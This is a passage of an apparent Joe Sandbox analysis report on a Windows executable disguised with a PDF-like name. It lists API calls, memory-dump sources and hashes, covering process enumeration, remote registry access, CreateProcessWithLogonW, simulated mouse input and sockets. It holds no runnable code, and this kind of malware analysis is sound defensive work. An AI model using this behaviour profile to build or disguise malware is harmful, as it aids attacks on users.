                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: 5cc75fa8e3866e5f01643cb9029d51a212a817211cf6b348cd74e004f2b58540
                                                    • Instruction ID: 3de683c60a456186b89d54f003def0422b4af80ab8b7660780594e2cdd172fc4
                                                    • Opcode Fuzzy Hash: 5cc75fa8e3866e5f01643cb9029d51a212a817211cf6b348cd74e004f2b58540
                                                    • Instruction Fuzzy Hash: B1216275200304AFDB59ABA9DC88DBA77ECEF09360B018165F909CB261EA74ED858764
                                                    APIs
                                                      • Part of subcall function 0035D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0035D1BA
                                                      • Part of subcall function 0035D17C: GetStockObject.GDI32(00000011), ref: 0035D1CE
                                                      • Part of subcall function 0035D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0035D1D8
                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003AA32D
                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003AA33A
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003AA345
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003AA354
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003AA360
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                    • String ID: Msctls_Progress32
                                                    • API String ID: 1025951953-3636473452
                                                    • Opcode ID: 0d3f39070210d180d0400dbd124da9e9a9860d0e1b46afc409e28e775fe1e440
                                                    • Instruction ID: e5b4797baa9494d1b78597f5ff9a0ba5d71ecba70bb723ec2cead58b9d1df288
                                                    • Opcode Fuzzy Hash: 0d3f39070210d180d0400dbd124da9e9a9860d0e1b46afc409e28e775fe1e440
                                                    • Instruction Fuzzy Hash: 031160B6150219BEEF169F64CC85EEB7F6DFF09798F014115FA08A60A0C7729C21DBA4
                                                    APIs
                                                    • GetClientRect.USER32(?,?), ref: 0035CCF6
                                                    • GetWindowRect.USER32(?,?), ref: 0035CD37
                                                    • ScreenToClient.USER32(?,?), ref: 0035CD5F
                                                    • GetClientRect.USER32(?,?), ref: 0035CE8C
                                                    • GetWindowRect.USER32(?,?), ref: 0035CEA5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Rect$Client$Window$Screen
                                                    • String ID:
                                                    • API String ID: 1296646539-0
                                                    • Opcode ID: e32feb8c94a2149dcf58f695c7eb3bca15233184dddaa25899392d80e69f06f8
                                                    • Instruction ID: eeea36300c7ed387f8c354a54ec6f7f57c481cd4ac9368f77070e25156cbdd80
                                                    • Opcode Fuzzy Hash: e32feb8c94a2149dcf58f695c7eb3bca15233184dddaa25899392d80e69f06f8
                                                    • Instruction Fuzzy Hash: DCB17979910249DFCB11CFA8C480BEDBBB5FF08309F15A129ED59EB620DB30A954CB64
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 003A1C18
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 003A1C26
                                                    • __wsplitpath.LIBCMT ref: 003A1C54
                                                      • Part of subcall function 00361DFC: __wsplitpath_helper.LIBCMT ref: 00361E3C
                                                    • _wcscat.LIBCMT ref: 003A1C69
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 003A1CDF
                                                    • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 003A1CF1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                    • String ID:
                                                    • API String ID: 1380811348-0
                                                    • Opcode ID: fa3562a0465fade33d61cf16c6643c6354ce5db68c92ab79e6f491aa1cf710ce
                                                    • Instruction ID: c289d8a0083bfe5643d19b3b145ef06300fee609edd48481965fe7855dba6d2f
                                                    • Opcode Fuzzy Hash: fa3562a0465fade33d61cf16c6643c6354ce5db68c92ab79e6f491aa1cf710ce
                                                    • Instruction Fuzzy Hash: 26515E711043409FD722EF64D885EABB7ECEF89754F04492EF9859B261EB70E904CB92
                                                    APIs
                                                      • Part of subcall function 003A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003A2BB5,?,?), ref: 003A3C1D
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A30AF
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003A30EF
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 003A3112
                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003A313B
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003A317E
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 003A318B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                    • String ID:
                                                    • API String ID: 3451389628-0
                                                    • Opcode ID: cfacd1329dc53c79b984d20cba1638ac87e739044611fa6ecf8d270f90ef7931
                                                    • Instruction ID: b8b19ee7102746945c59f22ad8a04b3bed8dee1a7a2e49b5316bd1e006c3fec7
                                                    • Opcode Fuzzy Hash: cfacd1329dc53c79b984d20cba1638ac87e739044611fa6ecf8d270f90ef7931
                                                    • Instruction Fuzzy Hash: AE513831218300AFC706EF64CC85E6ABBE9FF89304F04496DF5559B2A1DB71EA05CB52
                                                    APIs
                                                    • GetMenu.USER32(?), ref: 003A8540
                                                    • GetMenuItemCount.USER32(00000000), ref: 003A8577
                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003A859F
                                                    • GetMenuItemID.USER32(?,?), ref: 003A860E
                                                    • GetSubMenu.USER32(?,?), ref: 003A861C
                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 003A866D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountMessagePostString
                                                    • String ID:
                                                    • API String ID: 650687236-0
                                                    • Opcode ID: ce530c0d46c05ae06d445e594ff014cb3123934fe3b17e5e1a2b8477b8c70b48
                                                    • Instruction ID: 8d67ab3199a4f0513c38bd99b0164db5bac77e968391971d2fa3e3e8660d540f
                                                    • Opcode Fuzzy Hash: ce530c0d46c05ae06d445e594ff014cb3123934fe3b17e5e1a2b8477b8c70b48
                                                    • Instruction Fuzzy Hash: 64519075E00215AFDB16EF94C941AAEB7F9EF49310F114469F915BB361CB30BE418B90
                                                    APIs
                                                    • _memset.LIBCMT ref: 00384B10
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00384B5B
                                                    • IsMenu.USER32(00000000), ref: 00384B7B
                                                    • CreatePopupMenu.USER32 ref: 00384BAF
                                                    • GetMenuItemCount.USER32(000000FF), ref: 00384C0D
                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00384C3E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                    • String ID:
                                                    • API String ID: 3311875123-0
                                                    • Opcode ID: c5c2dcb13908b27cea7b78ea3d567ed2c4a7e61d0f973c19c63e1271b25b95d8
                                                    • Instruction ID: fc8dcc296d8b24523bd26809fefed24bfd2d5203950ba912473613217874c611
                                                    • Opcode Fuzzy Hash: c5c2dcb13908b27cea7b78ea3d567ed2c4a7e61d0f973c19c63e1271b25b95d8
                                                    • Instruction Fuzzy Hash: A651027060130AEFCF23EF68C888BADBBF8BF44318F1541A9E4559B691E3709944CB51
                                                    APIs
                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,003DDC00), ref: 00398E7C
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00398E89
                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00398EAD
                                                    • #16.WSOCK32(?,?,00000000,00000000), ref: 00398EC5
                                                    • _strlen.LIBCMT ref: 00398EF7
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00398F6A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_strlenselect
                                                    • String ID:
                                                    • API String ID: 2217125717-0
                                                    • Opcode ID: b9ad38ce6867a4facfc06f6677e9cd1ce48a4d95d59a7fd46d673a1be565beaa
                                                    • Instruction ID: 9b774e04f543fa7f34be57d597d1dc2afb4b56d2a935dc5d6ad3fee427b65690
                                                    • Opcode Fuzzy Hash: b9ad38ce6867a4facfc06f6677e9cd1ce48a4d95d59a7fd46d673a1be565beaa
                                                    • Instruction Fuzzy Hash: A8419271900204AFCB16EF64DD95EAEB7BDEF49314F104669F5169B291DF70AE00CB60
                                                    APIs
                                                      • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                                    • BeginPaint.USER32(?,?,?), ref: 0035AC2A
                                                    • GetWindowRect.USER32(?,?), ref: 0035AC8E
                                                    • ScreenToClient.USER32(?,?), ref: 0035ACAB
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0035ACBC
                                                    • EndPaint.USER32(?,?,?,?,?), ref: 0035AD06
                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 003BE673
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                    • String ID:
                                                    • API String ID: 2592858361-0
                                                    • Opcode ID: 3e884d882ae26d70d5cbacfdf99a74eaf572a954578fe8ec67dc7b9d3e2415b4
                                                    • Instruction ID: af20013d1fb102a9ce083687ef840b337980b6ac9d1fc7aeef9baa9c1aae1a3f
                                                    • Opcode Fuzzy Hash: 3e884d882ae26d70d5cbacfdf99a74eaf572a954578fe8ec67dc7b9d3e2415b4
                                                    • Instruction Fuzzy Hash: C4419F711046009FC712DF28CC84FAA7BF8AB59325F040769FAA4D72B1C731A848EB62
                                                    APIs
                                                    • ShowWindow.USER32(00401628,00000000,00401628,00000000,00000000,00401628,?,003BDC5D,00000000,?,00000000,00000000,00000000,?,003BDAD1,00000004), ref: 003AE40B
                                                    • EnableWindow.USER32(00000000,00000000), ref: 003AE42F
                                                    • ShowWindow.USER32(00401628,00000000), ref: 003AE48F
                                                    • ShowWindow.USER32(00000000,00000004), ref: 003AE4A1
                                                    • EnableWindow.USER32(00000000,00000001), ref: 003AE4C5
                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 003AE4E8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$Enable$MessageSend
                                                    • String ID:
                                                    • API String ID: 642888154-0
                                                    • Opcode ID: bbc5770464d90d7352188402daecebf2de0fa2718d4978a3cd04370aa2d4b7e0
                                                    • Instruction ID: b2376b8a95128bc298852f0aff836cb3c1a7a2c8266425428163efa8503e32a0
                                                    • Opcode Fuzzy Hash: bbc5770464d90d7352188402daecebf2de0fa2718d4978a3cd04370aa2d4b7e0
                                                    • Instruction Fuzzy Hash: D7414934601151EFDB23CF29C499F947BE9FB4A304F5981B9FA588F2A2C731A842CB51
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 003898D1
                                                      • Part of subcall function 0035F4EA: std::exception::exception.LIBCMT ref: 0035F51E
                                                      • Part of subcall function 0035F4EA: __CxxThrowException@8.LIBCMT ref: 0035F533
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00389908
                                                    • EnterCriticalSection.KERNEL32(?), ref: 00389924
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0038999E
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003899B3
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 003899D2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 2537439066-0
                                                    • Opcode ID: 3442cf7d389bc46d57c3528eb524af21586e2ff7f346d67e3f033845145a39df
                                                    • Instruction ID: d4655f2b14e37f3da731991401e77713dbb2cb6564ab06d30d349ec468536097
                                                    • Opcode Fuzzy Hash: 3442cf7d389bc46d57c3528eb524af21586e2ff7f346d67e3f033845145a39df
                                                    • Instruction Fuzzy Hash: E6315071900205EFDB12AF95DC85EAAB778FF45311F1480B9F904EB256D774EA14CBA0
                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,003977F4,?,?,00000000,00000001), ref: 00399B53
                                                      • Part of subcall function 00396544: GetWindowRect.USER32(?,?), ref: 00396557
                                                    • GetDesktopWindow.USER32 ref: 00399B7D
                                                    • GetWindowRect.USER32(00000000), ref: 00399B84
                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00399BB6
                                                      • Part of subcall function 00387A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00387AD0
                                                    • GetCursorPos.USER32(?), ref: 00399BE2
                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00399C44
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                    • String ID:
                                                    • API String ID: 4137160315-0
                                                    • Opcode ID: 5a15fe19bb8b418f95c81bd3290845dc192efc1e34d367a5b37cfb60b51ba9ad
                                                    • Instruction ID: 27886254afa825554dd752843f187d3fae38fbddfba3e178e39c9f1e13b119d7
                                                    • Opcode Fuzzy Hash: 5a15fe19bb8b418f95c81bd3290845dc192efc1e34d367a5b37cfb60b51ba9ad
                                                    • Instruction Fuzzy Hash: BF31CE72104309ABCB11DF58DC49F9AB7EDFF89314F01092AF599E7181DA31EA04CB92
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0037AFAE
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0037AFB5
                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0037AFC4
                                                    • CloseHandle.KERNEL32(00000004), ref: 0037AFCF
                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0037AFFE
                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 0037B012
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                    • String ID:
                                                    • API String ID: 1413079979-0
                                                    • Opcode ID: 4b8c2c02b3ea8b45dc24b213a2756ec7543e78f068a9cf2dfecc3c768317b30e
                                                    • Instruction ID: 59c3f697284a20f1de13860465e0c3d589817398381b45c9fc7b5b4807896afa
                                                    • Opcode Fuzzy Hash: 4b8c2c02b3ea8b45dc24b213a2756ec7543e78f068a9cf2dfecc3c768317b30e
                                                    • Instruction Fuzzy Hash: 9D214C7210560DABDB238F98DD09FAE7BADAB84304F058025FA05E6161C37A9D21EB61
                                                    APIs
                                                      • Part of subcall function 0035AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0035AFE3
                                                      • Part of subcall function 0035AF83: SelectObject.GDI32(?,00000000), ref: 0035AFF2
                                                      • Part of subcall function 0035AF83: BeginPath.GDI32(?), ref: 0035B009
                                                      • Part of subcall function 0035AF83: SelectObject.GDI32(?,00000000), ref: 0035B033
                                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 003AEC20
                                                    • LineTo.GDI32(00000000,00000003,?), ref: 003AEC34
                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 003AEC42
                                                    • LineTo.GDI32(00000000,00000000,?), ref: 003AEC52
                                                    • EndPath.GDI32(00000000), ref: 003AEC62
                                                    • StrokePath.GDI32(00000000), ref: 003AEC72
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                    • String ID:
                                                    • API String ID: 43455801-0
                                                    • Opcode ID: 69ab0ae35fc6052cb7f07b90565a30c8927a7308cf662530ab2552fc613281a3
                                                    • Instruction ID: 10e02693e4281ec42ee04cdb540c3ab8c68ac7eb6dcfd8681340797fc92827ff
                                                    • Opcode Fuzzy Hash: 69ab0ae35fc6052cb7f07b90565a30c8927a7308cf662530ab2552fc613281a3
                                                    • Instruction Fuzzy Hash: 9E110972000159BFEB029F94DD88EEA7F6DEB08360F048126FE0899170D771AD55DBA0
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0037E1C0
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0037E1D1
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0037E1D8
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0037E1E0
                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0037E1F7
                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0037E209
                                                      • Part of subcall function 00379AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00379A05,00000000,00000000,?,00379DDB), ref: 0037A53A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CapsDevice$ExceptionRaiseRelease
                                                    • String ID:
                                                    • API String ID: 603618608-0
                                                    • Opcode ID: 9db2bb3b09907360df8b6b0dd19715f5b6391e3c2f56df6c10550e0b94a6c425
                                                    • Instruction ID: be28ea4040b067acb2f7443fc8f8100f599c510af706fc6a769e87031e65c7dc
                                                    • Opcode Fuzzy Hash: 9db2bb3b09907360df8b6b0dd19715f5b6391e3c2f56df6c10550e0b94a6c425
                                                    • Instruction Fuzzy Hash: F40184B5A00214BFEB119BA5DC45F5EBFB8EB48351F018066FA08E7290D6719C00CF60
                                                    APIs
                                                    • __init_pointers.LIBCMT ref: 00367B47
                                                      • Part of subcall function 0036123A: __initp_misc_winsig.LIBCMT ref: 0036125E
                                                      • Part of subcall function 0036123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00367F51
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00367F65
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00367F78
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00367F8B
                                                      • Part of subcall function 0036123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00367F9E
